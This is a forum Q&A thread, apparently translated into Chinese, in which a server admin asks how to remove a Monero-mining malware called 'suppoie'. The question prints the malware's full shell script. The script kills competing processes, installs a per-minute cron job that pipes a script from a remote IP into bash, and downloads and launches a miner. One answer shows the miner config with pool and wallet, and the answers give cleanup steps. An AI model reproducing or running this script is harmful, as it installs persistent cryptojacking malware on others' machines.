suppoie 恶意软件清除 (脚本隐藏在 .jpg 中)

tag-icon tag-icon 16.04 malware
suppoie 恶意软件清除 (脚本隐藏在 .jpg 中)

在 Ubuntu 16.04 服务器上发现此问题。我猜是恶意软件,但有没有指南可以确保我能将其全部清除?

curl -s http://158.69.133.18:8220/logo7.jpg

#!/bin/sh
ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."

答案1

它位于你的 www-data cron 中:

    sudo crontab -e -u www-data

你会看到类似这样的内容:

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

终止进程然后将其从 /var/tmp 中清除

答案2

我猜这是一个比特币挖掘恶意软件,有人发现了 drupal 的安全漏洞并将这个脚本放在了我的服务器上。

在我的例子中,它位于 /var/spool/cron/crontabs/ 中,也可以使用 curl 命令

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

脚本位于 /var/tmp/config.json 和 suppoie 中,如下所示

{
"algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
"av": 0,                // algorithm variation, 0 auto select
"background": true,    // true to run the miner in the background
"colors": true,         // false to disable colored output    
"cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1,      // donate level, mininum 1%
"log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
"print-time": 60,       // print hashrate report every N seconds
"retries": 5,           // number of times to retry before switch to backup server
"retry-pause": 5,       // time to pause between retries
"safe": false,          // true to safe adjust threads and av settings for current CPU
"threads": null,        // number of miner threads
"pools": [
    {
        "url": "stratum+tcp://monerohash.com:5555",   // URL of mining server
        "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo",                        // username for mining server
        "pass": "x",                       // password for mining server
        "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
        "nicehash": false                  // enable nicehash/xmrig-proxy support
    }
],
"api": {
    "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
    "access-token": null,                  // access token for API
    "worker-id": null                      // custom worker-id for API
}

删除 crontabs 中的行,并清除 /var/tmp/,似乎有效

相关内容